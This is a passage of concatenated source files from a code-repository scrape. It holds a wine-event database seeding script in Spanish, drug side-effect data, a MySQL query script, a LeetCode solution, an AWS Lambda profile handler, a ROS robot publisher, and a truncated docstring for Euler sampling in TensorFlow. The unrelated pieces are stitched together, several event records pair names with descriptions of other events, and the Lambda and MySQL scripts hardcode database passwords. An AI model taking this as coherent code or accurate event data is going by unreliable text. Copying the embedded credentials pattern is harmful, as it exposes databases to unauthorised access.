Asimismo, en el marco del evento, La Rural y Bodegas de Argentina llevarán a cabo iniciativas de sustentabilidad. A través de “La Rural Recicla” y con la colaboración de las bodegas participantes, se recuperarán el cartón y las botellas de vidrio consumidas durante la exposición, que luego serán donados a la Cooperativa El Ceibo para su reciclado. También se impulsará el programa “Wine in Moderation”, que fomenta el consumo moderado y responsable, como la forma más inteligente de apreciar las virtudes y características de los grandes vinos que se presentarán. Además, los visitantes tendrán acceso permanente a estaciones de hidratación libre.
Vinos y Bodegas | Edición 2015
Organizadores: organiza Bodegas de Argentina y realiza La Rural, Predio Ferial de Buenos Aires.
Sede: La Rural, Predio Ferial de Buenos Aires, Pabellón Frers.
Ingresos: Av. Santa Fe 4363
Estacionamiento: Av. Sarmiento 2704 y Av. Cerviño 4476
Días: 24, 25 y 26 de septiembre
Horario: 18 a 23hs
Valor de la entrada: $200.-. (Incluye 12 copas de degustación)
Más información en: www.expovinosybodegas.com.ar"''', nombre = 'ROSARIO ALTA GAMA 2015',caracteristicas= ' Llega la segunda edición de Vinos de Argentina. El próximo 8 y 9 de mayo se realizará la Segunda Edición de Vinos de Argentina en Casa Las Cañitas (Huergo 283, CABA) de 18 a 23 hs. Esta feria vuelve a reunir en un espacio cálido y distendido a ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51793_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('17/4/2015',fdate), direccion='Evento Global.', detalle='''
En esta 5ta. Edición del Malbec World Day se llevarán a cabo más de 70 eventos en 64 ciudades de 50 países del mundo para hacerle honor a la cepa insignia de la Argentina. En todos ellos se exhibirán tres cortometrajes seleccionados por WofA y creados para que sus espectadores puedan realizar una inmersión en la cultura argentina y específicamente en el Malbec, un morocho nacido en Francia que supo convertirse en el argentino más grande. Este año el evento tendrá como coprotagonista al cine, que al igual que el vino combina arte e industria a la vez. Hacer cine implica crear experiencias audiovisuales, contar historias, agudizar nuestra percepción del mundo e inventar atmósferas que estimulan nuestros sentidos. La cinematografía engloba diversas disciplinas: fotografía, literatura (guión), música, actuación y montaje. Es un proceso largo que incluye el trabajo de toda una industria. Su parte final, el montaje, implica una selección cuidadosa de los elementos de trabajo y la realización de una síntesis perfecta. Del mismo modo, nuestro vino Malbec es arte porque refleja nuestra manera de ser argentinos, simboliza nuestro carácter, nuestra pasión y nuestra relación férrea con la tierra, crea atmósferas íntimas que refuerzan vínculos, aportan calidez y confianza, alteran nuestra percepción sensorial; y es industria porque reúne las capacidades de nuestro capital humano y los avances tecnológicos para mejorar con el tiempo. Lights, Camera, Malbec es una feria dirigida a jóvenes de 25 a 35 años y su propuesta incluye degustar vinos Malbec de todos los estilos y terroirs, disfrutar de la oferta gastronómica de los food trucks, incorporar tips en mini charlas, bajar gratis la aplicación oficial del evento, disponible para iPhone y Android, en la que se encontrarán con todos los vinos pre-cargados, para que los asistentes puedan clickear "Me Gusta" y de esa manera tenerlos entre sus favoritos. El mismo formato de Lights, Camera, Malbec se replicará en New York, Estados Unidos; Lima, Perú; San Pablo, Brasil, el Distrito Federal de México; Bogotá, Colombia y Buenos Aires, Argentina. Asimismo, se desarrollarán campañas con los principales retailers de Reino Unido, Canadá, Brasil y México para promover las ventas. Todas las acciones tienen como objetivo proporcionar a los asistentes una experiencia de inmersión en la cultura y el espíritu de Argentina, en el cual el vino es una parte esencial. Asimismo, junto con el Ministerio de Relaciones Exteriores, Comercio Internacional y Culto de la Nación Argentina y los Gobiernos Provinciales, se llevarán a cabo eventos con periodistas, compradores e invitados especiales, que incluyen degustaciones, shows de tango, comidas, en más de 64 representaciones de 50 países alrededor del mundo. LIGHTS, CAMERA, MALBEC - CALENDARIO 2015 Buenos Aires 10 de Abril Bogotá 16 de abril Lima 17 de Abril Nueva York 17 de Abril Londres 17 de abril San Pablo 23 de Abril Manitoba 27 de abril México DF 30 de Abril Más información: <a href="http://www.malbecworldday.com/" target="_blank">www.malbecworldday.com <center><img src="/images/eventos/MalbecWorldDay20152.jpg"></center>
"''', nombre = 'VINOS DE ARGENTINA 2DA EDICIÓN',caracteristicas= ' Este año inaugura nueva sede sera en el resto bar La Reina (Cno. centenario y 511) los días jueves 7 y viernes 8 de mayo en el horario de 19 a 23 horas. ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51902_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('10/4/2015',fdate), precio='A confirmar', direccion='Reservas al 1532930227 o al 155041-2721. Cupos Limitados.', detalle='''Mañana Viernes 10 de Abril estaremos participando en una de las Cenas Degustación de Mi Colección de Vinos. Sommelier : Augusto Zegarra.''', nombre = 'FERIA DE VINOS CITY BELL 5TA EDICIÓN',caracteristicas= ' En conmemoración a la quinta celebracion del día internacional del Malbec, en el mes de Abril del 2015 les propondremos ser parte de +Wine Edition #2 bajo el slogan: "WE LOVE MALBEC" en donde, como ya es costumbre, contaremos con dos sectores de de ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51979_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('9/4/2015',fdate), precio='$150 efectivo', direccion='Reservas al 4775-4369', detalle='''
Esta noche te esperamos en Chenaut 1912 (Las Cañitas) para degustar la línea Primogénito. Para culminar habrá un tapeo especial, te lo vas a perder?"
''', nombre = 'WINE EDITION #2',caracteristicas= ' Te invitamos a festejar el MALBEC WORLD DAY. No te lo pierdas este Sábado 18 de Abril en el Club Italiano de la Ciudad de Neuquén. ...,', imagen = open('C:\\imagenes\\eventos\\thumb_52089_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('4/6/2015',fdate), fecha_fin=datetime.strptime('6/6/2015',fdate), direccion='Terrazas del Paraná, Estación Fluvial de Rosario.', detalle='''
Alta Gama Rosario vuelve del 4 al 6 de junio de 2015 para brindar por sus 11 años con un recorrido totalmente renovado en el ámbito de Terrazas del Paraná, en La Estación Fluvial de Rosario, presentando una gran cantidad de expositores. En 2015 Alta Gama Rosario se dedicará a presentar aquellos nuevos y grandes vinos de las distintas regiones de nuestro país. Todas las noches habrá un brindis muy especial con música en vivo, charlas y degustaciones privadas, y la presencia de personalidades del mundo del vino. Confirmaron su participación en Alta Gama 2015 las bodegas: Casa Bianchi - Bodegas López - Finca La Luz (Callejón del Crímen) - Gouguenheim - Finca Flichman - Cafayate (Etchart) - Vistalba - Casarena - Hess Family - Humberto Canale - Gimenez Riili - Familia Zuccardi - Puertas de los Andes, Nómade Wines - Jean Rivier - Dante Robino - Telteca - A16 (Auge Vinos) - Catena Zapata - Viña Las Perdices - Otaviano - Laureano Gómez - Angelado - Avarizza - El Equilibrista Wines - La Azul - Eduardo Vidal Wines - Fabricio Orlando Wines - La Rural - Chandon - Terrazas de los Andes - Domados Wines - Rutini Wines - CarinaE - Domingo Hnos. - Alto Uxmal - Fica Sophenia - Huarpe Wines - Joffré e Hijas - Casa Margot - Paiman - Los Cerrillos - Freixenet - Finca La Anita - Alfredo Roca - Finca Decero - Noemía - Aniello - Chacra - Fabre Montmayou - Flia. Schröeder - Kaikén - Vicentín Family Wines - Rosell Boher - Mosquita Muerta Wines - Bodega Raffy Junto a la gastronomía de: ISHyR / Alta Cocina, Paladini Quesos y sus selectos fiambres L'Abratto, Quesos Tregar, Aceites Zuccardi, Catena Institute of Wines, Río Helados, establecimientos La Cumbre, Frozen Bag y Aguas Waterin. El jueves 4 de junio Alta Gama Rosario 2015 comenzará con un horario dedicado especialmente a traders, un espacio de contacto directo entre las bodegas y los compradores del vino y la prensa especializada. Ese mismo día, a partir de las 19, el salón se abrirá al público en general y a las 20.30 se llevará a cabo la inauguración oficial con el gran descorche de apertura a cargo de los organizadores junto a las autoridades de nuestra ciudad. Para más información: www.rosarioaltagama.com info@rosarioaltagama.com Facebook: Alta Gama Rosario Twitter: @AltaGamaRosario "''', nombre = 'MALBEC WORLD DAY CON PATRITTI',caracteristicas= ' En esta 5ta. Edición del Malbec World Day se llevarán a cabo más de 70 eventos en 64 ciudades de 50 países del mundo para hacerle honor a la cepa insignia de la Argentina. En todos ellos se exhibirán tres cortometrajes seleccionados por WofA y c ...,', imagen = open('C:\\imagenes\\eventos\\thumb_52210_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('8/5/2015',fdate), fecha_fin=datetime.strptime('9/5/2015',fdate), precio='$150', direccion='Casa Las Cañitas - Huergo 283, CABA.', detalle='''
Llega la segunda edición de Vinos de Argentina. El próximo 8 y 9 de mayo se realizará la Segunda Edición de Vinos de Argentina en Casa Las Cañitas (Huergo 283, CABA) de 18 a 23 hs. Esta feria vuelve a reunir en un espacio cálido y distendido a las 14 provincias productoras de vinos en el país. Los invitados podrán degustar los diferentes varietales de Jujuy, Salta, Tucumán, Catamarca, La Rioja, San Juan, San Luis, Mendoza, Córdoba, Buenos Aires, La Pampa, Río Negro, Neuquén y Chubut. Además, las bodegas seleccionadas brindarán las claves de cada terruño en los que nacen sus vinos y darán a conocer sus más destacados productos. Tenemos un gran país productor, con tierra generosa, enólogos que apuestan a lo singular y una gran industria que se pone en movimiento detrás de cada copa. Vinos de Argentina se transforma en un paseo vitivinícola federal con vinos de altura, vinos patagónicos y vinos impensados. "''', nombre = 'MALBEC WORLD DAY 2015',caracteristicas= ' En la tercera edición, la gran fiesta del Día del Gourmet extiende su duración: comienza el sábado 11 abril y cierra el 14, la fecha de su celebración. Serán cuatro días gloriosos para disfrutar el placer de los aromas y sabores de la gastrono ...,', imagen = open('C:\\imagenes\\eventos\\thumb_52214_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('29/3/2015',fdate), precio='Gratis', direccion='El Dorrego: Zapiola 50 - Palermo. Ciudad de Buenos Aires', detalle='''
Este fin de semana nos vemos en Celebra Patagonia desde el mediodía en El Dorrego: Zapiola 50 (Palermo). Además de poder adquirir nuestros vinos y platos típicos de la región, podrás disfrutar de clases de cocina con Narda Lepes, Pablo Buzzo y <a href="https://www.facebook.com/PetersenRoberto">Roberto Petersen. También se presentará la Camerata Bariloche - Orquesta de Cámara Clásica y <a href="https://www.facebook.com/la.pipetua">La Pipetuá. Te esperamos!! "
''', nombre = 'DÍA DEL GOURMET 2015',caracteristicas= ' Mañana Viernes 10 de Abril estaremos participando en una de las Cenas Degustación de Mi Colección de Vinos. Sommelier : Augusto Zegarra. ...,', imagen = open('C:\\imagenes\\eventos\\thumb_52702_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('7/5/2015',fdate), fecha_fin=datetime.strptime('8/5/2015',fdate), precio='A confirmar', direccion='"https://www.facebook.com/feriadevinoscitybell', detalle='''
Este año inaugura nueva sede sera en el resto bar La Reina (Cno. centenario y 511) los días jueves 7 y viernes 8 de mayo en el horario de 19 a 23 horas.
''', nombre = 'CENA DEGUSTACIÓN EN MI COLECCIÓN DE VINOS - BODEGA PATRITTI',caracteristicas= ' Esta noche te esperamos en Chenaut 1912 (Las Cañitas) para degustar la línea Primogénito. Para culminar habrá un tapeo especial, te lo vas a perder? ...,', imagen = open('C:\\imagenes\\eventos\\thumb_52703_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('3/4/2015',fdate), direccion='Centro de Convenciones Arrayanes - Villa la Angostura.', detalle='''
Este viernes nos encontramos en Expo Vinos Angostura. Los esperamos de 12 a 23 hs en el Centro de Convenciones Arrayanes. ''', nombre = 'BODEGA PATRITTI EN VINOTECA 1912',caracteristicas= ' Este viernes nos encontramos en Expo Vinos Angostura. Los esperamos de 12 a 23 hs en el Centro de Convenciones Arrayanes. ...,', imagen = open('C:\\imagenes\\eventos\\thumb_52704_default_medium.jpeg','rb'))
except Exception as e:
print e
return True
| [
"villan.laura@gmail.com"
] | villan.laura@gmail.com |
c56498fc4dae80612f8baae4f506c36ed59b0171 | b39d9ef9175077ac6f03b66d97b073d85b6bc4d0 | /Benzylpenicillin_Panpharma_powder_for_solution_for_injection_or_infusion_SmPC.py | 69089c71ae727141e3d4f4acc96f228c2a5007ba | [] | no_license | urudaro/data-ue | 2d840fdce8ba7e759b5551cb3ee277d046464fe0 | 176c57533b66754ee05a96a7429c3e610188e4aa | refs/heads/master | 2021-01-22T12:02:16.931087 | 2013-07-16T14:05:41 | 2013-07-16T14:05:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | {'_data': [['Uncommon',
[['General',
u'(>1/1 000 till Blodet och lymfsystemet: eosinofili < 1/100): Hud och subkutan v\xe4vnad: urtikaria']]],
['Rare',
[['General',
u'< 1/1 000): anafylaktiska reaktioner. Blodet och lymfsystemet: agranulocytos, hemolytisk anemi, leukopeni. Magtarmkanalen: diarr\xe9 orsakad av Clostridium difficile.']]],
['Unknown', [['General', u'tromboflebit']]]],
'_pages': [2, 3],
u'_rank': 3,
u'_type': u'LSFU'} | [
"daro@daro-ThinkPad-X220.(none)"
] | daro@daro-ThinkPad-X220.(none) |
c317a09ce75d6e4aef775c02a3fa0eaa148cf157 | c701cb59fc58bb01994ac1ec6caae54383f38606 | /sql.py | 99e1f75015f522ecafcc0ad5defcd728f650d534 | [] | no_license | ya0yue/CBIR-System-Based-on-OpenCV | fe9e1f9f98820477773012960d8f9746a8caae8e | e5b861cd8348ab753042d1dbc203bd5ab84f2b4f | refs/heads/master | 2021-01-01T17:53:45.168517 | 2017-07-24T12:43:15 | 2017-07-24T12:43:15 | 98,189,555 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 11 12:31:51 2017
@author: Mars
"""
import MySQLdb
# 打开数据库连接
db = MySQLdb.connect("localhost","root","root","sys" )
# 使用cursor()方法获取操作游标
cursor = db.cursor()
# 使用execute方法执行SQL语句
cursor.execute("SELECT * from sys.path_table")
# 使用 fetchone() 方法获取一条数据库。
data = cursor.fetchone()
print data
#print ("Database version : %s " % data)
# 关闭数据库连接
db.close()
| [
"ya0yue@163.com"
] | ya0yue@163.com |
c93dc563ea1949b6da100813fc21b5da41154c7b | a0ae54b00f273e7e896a13a82eae421306e04138 | /leetcode/BinaryTreeLevelOrderTraversal2.py | e3ec46113325eb64d51adf33f1835a4b8077ec99 | [] | no_license | kth496/Algorithm-study | afdcf3de47e66842af3b9d2c0273c66492020fae | 8911b07a19f20bf2011f44c4444c2817d162ea14 | refs/heads/master | 2023-02-16T19:32:50.315782 | 2023-02-07T15:11:16 | 2023-02-07T15:11:16 | 276,591,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | class Solution:
def levelOrderBottom(self, root: TreeNode) -> List[List[int]]:
ret = []
q = deque()
q.append((root, 1))
if not root: return ret
while q:
cur, depth = q.popleft()
if not cur: continue
if len(ret) < depth:
level = []
ret.insert(0, level)
ret[-depth].append(cur.val)
q.append((cur.left, depth + 1))
q.append((cur.right, depth + 1))
return ret
| [
"noreply@github.com"
] | kth496.noreply@github.com |
9d41aba287470cf0dce352ba68db49e18234b6bd | a55e2c2c7bfe67179b7ca39cd9f54e93fc786d21 | /src/mbot_sim/scripts/cmd.py | b1bac712296d0e06f3f8bcd3976cdf3b66f312f6 | [] | no_license | EcustBoy/multi-robot-formation-control | 356e89151e028a562765e9f4c2f7a1fb1b498219 | 04926454c2c8c78239d8efd479d0b6fa431b6d8f | refs/heads/master | 2022-09-30T14:46:52.158758 | 2020-06-02T18:58:25 | 2020-06-02T18:58:25 | 258,541,239 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | import numpy as np
import math
import time
import rospy
import tf
import roslaunch
import rospkg
control_space=np.ones([1,2])
action=list()
t=0
def execute(action):
#action:[v,w]-linear/angular velocity
#rospy.wait_for_service('/gazebo/unpause_physics')
#try:
# self.unpause
#except rospy.ServiceException:
# print("/gazebo/unpause_physics service call failed")
rospy.init_node('env_node')
vel_pub_1 = rospy.Publisher('/mbot_1/cmd_vel', Twist, queue_size=5)
vel_pub_2 = rospy.Publisher('/mbot_2/cmd_vel', Twist, queue_size=5)
vel_cmd = Twist()
vel_cmd.linear.x=action['linear_vel']
vel_cmd.angular.z=action['angular_vel']
#vel=[vel_cmd.linear.x,vel_cmd.angular.z]
#print(vel)
vel_pub_1.publish(vel_cmd)
vel_pub_2.publish(vel_cmd)
time.sleep(0.05)
while True:
t=t+1
#compute consensus-based control input
#control_space[i,:]=np.array([np.sin(state_space[i,0]),np.sin(state_space[i,2])])
control_space=np.array([np.sin(t),np.cos(t)])
action.append({'linear_vel':control_space[0],'angular_vel':control_space[1]})
execute(action) | [
"779110563@qq.com"
] | 779110563@qq.com |
b4c3ae34a31eea385f146470bef67da7346f2e2e | 7330e1db3b07af48400e842c6ddb544fec91315d | /prepare_vectors.py | 806c2173fde53b229ab0d4d3c320a86af0bfd075 | [
"Apache-2.0"
] | permissive | karthikncode/Gaussian_LDA | 3d60dcc4662146ec7dd8692eec4716a8116bb63d | b5c105ac0515be9faa9cd38968c66138bb64a385 | refs/heads/master | 2021-01-09T20:48:59.553044 | 2016-02-28T17:35:33 | 2016-02-28T17:35:33 | 52,541,528 | 4 | 2 | null | 2016-02-25T16:56:56 | 2016-02-25T16:56:56 | null | UTF-8 | Python | false | false | 687 | py | ''' File to convert word vectors to proper format '''
import sys
vectorFile = sys.argv[1]
vocabFile = sys.argv[2]
outFile = sys.argv[3]
dim = -1
f = open(vectorFile, 'r').read().lower().strip().split('\n')
vectors = {}
for line in f:
line = line.split()
vectors[line[0]] = [float(q) for q in line[1:]]
if dim == -1:
dim = len(line) - 1
vocab = open(vocabFile).read().lower().strip().split('\n')
#write the vectors in the same order as vocab
g = open(outFile, 'w')
zeroVector = [0.0] * dim
for w in vocab:
if w in vectors:
vec = vectors[w]
else:
vec = zeroVector
g.write(' '.join([str(q) for q in vec]) + '\n')
g.close()
| [
"nkartr@gmail.com"
] | nkartr@gmail.com |
3463fb1018d3a2f5a0efe5c5b1b8ac5c67ebed56 | c77376430190c0c4d6d6d3cd23376d693661ccee | /FyreEmblemCapstone/CloudSripts/profile_lambda.py | 48221e1d8ef67f45ee5c633976d88cfd8ab93aba | [] | no_license | JMOatey/CapstoneProject | 2833cd3493ca1dc32c1cbb1ba1ab03e0d1f98212 | b0f63d331501b69828cf37e6e32ad8f6eb03353d | refs/heads/master | 2020-07-09T03:34:37.271240 | 2019-12-08T20:38:40 | 2019-12-08T20:38:40 | 203,861,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,066 | py | import boto3
import json
import pymysql
database_host = "capstone.ce8exeo9ulmj.us-east-1.rds.amazonaws.com"
database_port = 3306
database_username = "admin"
database_password = "capstone"
database_name = "capstone"
dynamodb = boto3.resource('dynamodb')
def get_profile(username, database):
try:
with database.cursor() as cursor:
sql = "SELECT data FROM profile WHERE username=%s"
cursor.execute(sql, (username, ))
result = cursor.fetchone()
return result.get('data')
except Exception as e:
print(e)
return None
def update_profile(username, profile_data, database):
try:
with database.cursor() as cursor:
sql = "UPDATE profile SET data=%s WHERE username=%s"
cursor.execute(sql, (profile_data, username))
database.commit()
return f"{username}'s profile has been updated."
except Exception as e:
print(e)
return None
def lambda_handler(event, context):
# Connect to database
database = pymysql.connect(
database_host,
user=database_username,
passwd=database_password,
db=database_name,
connect_timeout=5,
cursorclass=pymysql.cursors.DictCursor)
# Handle event
http_method = event.get("httpMethod")
username = event.get("requestContext", {}).get("authorizer", {}).get("claims", {}).get("username")
if http_method == "GET":
response = get_profile(username, database)
elif http_method == "PUT":
event_body = json.loads(event.get("body", {}))
profile_data = event_body.get("profile")
response = update_profile(username, profile_data, database)
code = True if response else False
body = {
"message": response,
"code": code
}
return {
'statusCode': 200,
'body': json.dumps(body)
}
if __name__ == "__main__":
lambda_handler(None, None) | [
"nk529@mail.missouri.edu"
] | nk529@mail.missouri.edu |
f6850b22904eed88158470115b93e6288b882b8d | 266265e04ab06bdcf3d51580f9720e2f89ecab22 | /prob01.py | 20c8e1300d99cf3e8fa915de5c718cda4f0f628f | [] | no_license | gioung/practice01 | 259034a1c4067e912d55bec89af6344d9918f66f | b5dc26567d762206e0714357b24b4c27143cb52e | refs/heads/master | 2020-06-03T11:26:57.651111 | 2019-06-13T08:33:48 | 2019-06-13T08:33:48 | 191,549,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py | # 키보드로 정수 수치를 입력 받아 그것이 3의 배수인지 판단하세요
import sys
number = input('수를 입력하세요: ')
if number.isdigit():
if int(number) % 3 == 0:
print('3의 배수 입니다.')
else:
print('3의 배수가 아닙니다.')
sys.exit(0)
print('정수가 아닙니다')
| [
"ska2253@naver.com"
] | ska2253@naver.com |
fd12b1ed954f0caf245bb4e4ff2f723ef1241618 | 6423f45f0a90bd33fcc126cd6c664bb604496e1b | /app/category.py | 32c459def0568c1d3dce6c3ba0301e30a4a0e25d | [] | no_license | lemonh4733/aukcionasPython | e698fd8db968eebd53342e90c4633e161b9076a7 | ea67c1a1c6642c3940d35d87775ad38fefa7b3e2 | refs/heads/master | 2021-05-20T03:02:48.293167 | 2020-04-05T23:20:38 | 2020-04-05T23:20:38 | 252,158,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | from app import db
class Category(db.Model):
id = db.Column(db.Integer, primary_key=True)
cat_name = db.Column(db.String(80), nullable=False)
| [
"simke95159@gmail.com"
] | simke95159@gmail.com |
813ed9d22c40ad0ebf512f0f48797ec447f7b234 | 00cb5907750926f1a9b0fde97301f10d01f49645 | /tf_quant_finance/models/euler_sampling.py | 27d3ed52099fd2850f5f9dd8d627110fafddc958 | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-generic-cla"
] | permissive | dannyb2018/tf-quant-finance | 63761e4a39b615da6a5258e48030d2b12a142b26 | 668b4fb0f91b1f60c9015cef087b3e879ee2a4f7 | refs/heads/master | 2023-07-07T20:00:59.529305 | 2021-08-18T13:05:11 | 2021-08-18T13:05:51 | 284,707,826 | 0 | 0 | Apache-2.0 | 2020-08-03T13:29:15 | 2020-08-03T13:29:14 | null | UTF-8 | Python | false | false | 22,684 | py | # Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Euler sampling method for ito processes."""
from typing import Callable, List, Optional
import tensorflow.compat.v2 as tf
from tf_quant_finance import types
from tf_quant_finance import utils as tff_utils
from tf_quant_finance.math import custom_loops
from tf_quant_finance.math import random
from tf_quant_finance.models import utils
def sample(
dim: int,
drift_fn: Callable[..., types.RealTensor],
volatility_fn: Callable[..., types.RealTensor],
times: types.RealTensor,
time_step: Optional[types.RealTensor] = None,
num_time_steps: Optional[types.IntTensor] = None,
num_samples: types.IntTensor = 1,
initial_state: Optional[types.RealTensor] = None,
random_type: Optional[random.RandomType] = None,
seed: Optional[types.IntTensor] = None,
swap_memory: bool = True,
skip: types.IntTensor = 0,
precompute_normal_draws: bool = True,
times_grid: Optional[types.RealTensor] = None,
normal_draws: Optional[types.RealTensor] = None,
watch_params: Optional[List[types.RealTensor]] = None,
validate_args: bool = False,
tolerance: Optional[types.RealTensor] = None,
dtype: Optional[tf.DType] = None,
name: Optional[str] = None) -> types.RealTensor:
"""Returns a sample paths from the process using Euler method.
For an Ito process,
```
dX = a(t, X_t) dt + b(t, X_t) dW_t
X(t=0) = x0
```
with given drift `a` and volatility `b` functions Euler method generates a
sequence {X_n} as
```
X_{n+1} = X_n + a(t_n, X_n) dt + b(t_n, X_n) (N(0, t_{n+1}) - N(0, t_n)),
X_0 = x0
```
where `dt = t_{n+1} - t_n` and `N` is a sample from the Normal distribution.
See [1] for details.
#### Example
Sampling from 2-dimensional Ito process of the form:
```none
dX_1 = mu_1 * sqrt(t) dt + s11 * dW_1 + s12 * dW_2
dX_2 = mu_2 * sqrt(t) dt + s21 * dW_1 + s22 * dW_2
```
```python
import tensorflow as tf
import tf_quant_finance as tff
import numpy as np
mu = np.array([0.2, 0.7])
s = np.array([[0.3, 0.1], [0.1, 0.3]])
num_samples = 10000
dim = 2
dtype = tf.float64
# Define drift and volatility functions
def drift_fn(t, x):
return mu * tf.sqrt(t) * tf.ones([num_samples, dim], dtype=dtype)
def vol_fn(t, x):
return s * tf.ones([num_samples, dim, dim], dtype=dtype)
# Set starting location
x0 = np.array([0.1, -1.1])
# Sample `num_samples` paths at specified `times` using Euler scheme.
times = [0.1, 1.0, 2.0]
paths = tff.models.euler_sampling.sample(
dim=dim,
drift_fn=drift_fn,
volatility_fn=vol_fn,
times=times,
num_samples=num_samples,
initial_state=x0,
time_step=0.01,
seed=42,
dtype=dtype)
# Expected: paths.shape = [10000, 3, 2]
```
#### References
[1]: Wikipedia. Euler-Maruyama method:
https://en.wikipedia.org/wiki/Euler-Maruyama_method
Args:
dim: Python int greater than or equal to 1. The dimension of the Ito
Process.
drift_fn: A Python callable to compute the drift of the process. The
callable should accept two real `Tensor` arguments of the same dtype.
The first argument is the scalar time t, the second argument is the
value of Ito process X - tensor of shape
`batch_shape + [num_samples, dim]`. `batch_shape` is the shape of the
independent stochastic processes being modelled and is inferred from the
initial state `x0`.
The result is value of drift a(t, X). The return value of the callable
is a real `Tensor` of the same dtype as the input arguments and of shape
`batch_shape + [num_samples, dim]`.
volatility_fn: A Python callable to compute the volatility of the process.
The callable should accept two real `Tensor` arguments of the same dtype
and shape `times_shape`. The first argument is the scalar time t, the
second argument is the value of Ito process X - tensor of shape
`batch_shape + [num_samples, dim]`. The result is value of drift b(t, X).
The return value of the callable is a real `Tensor` of the same dtype as
the input arguments and of shape `batch_shape + [num_samples, dim, dim]`.
times: Rank 1 `Tensor` of increasing positive real values. The times at
which the path points are to be evaluated.
time_step: An optional scalar real `Tensor` - maximal distance between
points in grid in Euler schema.
Either this or `num_time_steps` should be supplied.
Default value: `None`.
num_time_steps: An optional Scalar integer `Tensor` - a total number of time
steps performed by the algorithm. The maximal distance betwen points in
grid is bounded by `times[-1] / (num_time_steps - times.shape[0])`.
Either this or `time_step` should be supplied.
Default value: `None`.
num_samples: Positive scalar `int`. The number of paths to draw.
Default value: 1.
initial_state: `Tensor` of shape broadcastable with
`batch_shape + [num_samples, dim]`. The initial state of the process.
`batch_shape` represents the shape of the independent batches of the
stochastic process. Note that `batch_shape` is inferred from
the `initial_state` and hence when sampling is requested for a batch of
stochastic processes, the shape of `initial_state` should be at least
`batch_shape + [1, 1]`.
Default value: None which maps to a zero initial state.
random_type: Enum value of `RandomType`. The type of (quasi)-random
number generator to use to generate the paths.
Default value: None which maps to the standard pseudo-random numbers.
seed: Seed for the random number generator. The seed is
only relevant if `random_type` is one of
`[STATELESS, PSEUDO, HALTON_RANDOMIZED, PSEUDO_ANTITHETIC,
STATELESS_ANTITHETIC]`. For `PSEUDO`, `PSEUDO_ANTITHETIC` and
`HALTON_RANDOMIZED` the seed should be a Python integer. For
`STATELESS` and `STATELESS_ANTITHETIC `must be supplied as an integer
`Tensor` of shape `[2]`.
Default value: `None` which means no seed is set.
swap_memory: A Python bool. Whether GPU-CPU memory swap is enabled for this
op. See an equivalent flag in `tf.while_loop` documentation for more
details. Useful when computing a gradient of the op since `tf.while_loop`
is used to propagate stochastic process in time.
Default value: True.
skip: `int32` 0-d `Tensor`. The number of initial points of the Sobol or
Halton sequence to skip. Used only when `random_type` is 'SOBOL',
'HALTON', or 'HALTON_RANDOMIZED', otherwise ignored.
Default value: `0`.
precompute_normal_draws: Python bool. Indicates whether the noise increments
`N(0, t_{n+1}) - N(0, t_n)` are precomputed. For `HALTON` and `SOBOL`
random types the increments are always precomputed. While the resulting
graph consumes more memory, the performance gains might be significant.
Default value: `True`.
times_grid: An optional rank 1 `Tensor` representing time discretization
grid. If `times` are not on the grid, then the nearest points from the
grid are used. When supplied, `num_time_steps` and `time_step` are
ignored.
Default value: `None`, which means that times grid is computed using
`time_step` and `num_time_steps`.
normal_draws: A `Tensor` of shape broadcastable with
`batch_shape + [num_samples, num_time_points, dim]` and the same
`dtype` as `times`. Represents random normal draws to compute increments
`N(0, t_{n+1}) - N(0, t_n)`. When supplied, `num_samples` argument is
ignored and the first dimensions of `normal_draws` is used instead.
Default value: `None` which means that the draws are generated by the
algorithm. By default normal_draws for each model in the batch are
independent.
watch_params: An optional list of zero-dimensional `Tensor`s of the same
`dtype` as `initial_state`. If provided, specifies `Tensor`s with respect
to which the differentiation of the sampling function will happen.
A more efficient algorithm is used when `watch_params` are specified.
Note the the function becomes differentiable onlhy wrt to these `Tensor`s
and the `initial_state`. The gradient wrt any other `Tensor` is set to be
zero.
validate_args: Python `bool`. When `True` performs multiple checks:
* That `times` are increasing with the minimum increments of the
specified tolerance.
* If `normal_draws` are supplied, checks that `normal_draws.shape[1]` is
equal to `num_time_steps` that is either supplied as an argument or
computed from `time_step`.
When `False` invalid dimension may silently render incorrect outputs.
Default value: `False`.
tolerance: A non-negative scalar `Tensor` specifying the minimum tolerance
for discernible times on the time grid. Times that are closer than the
tolerance are perceived to be the same.
Default value: `None` which maps to `1-e6` if the for single precision
`dtype` and `1e-10` for double precision `dtype`.
dtype: `tf.Dtype`. If supplied the dtype for the input and output `Tensor`s.
Default value: None which means that the dtype implied by `times` is
used.
name: Python string. The name to give this op.
Default value: `None` which maps to `euler_sample`.
Returns:
A real `Tensor` of shape batch_shape_process + [num_samples, k, n] where `k`
is the size of the `times`, `n` is the dimension of the process.
Raises:
ValueError:
(a) When `times_grid` is not supplied, and neither `num_time_steps` nor
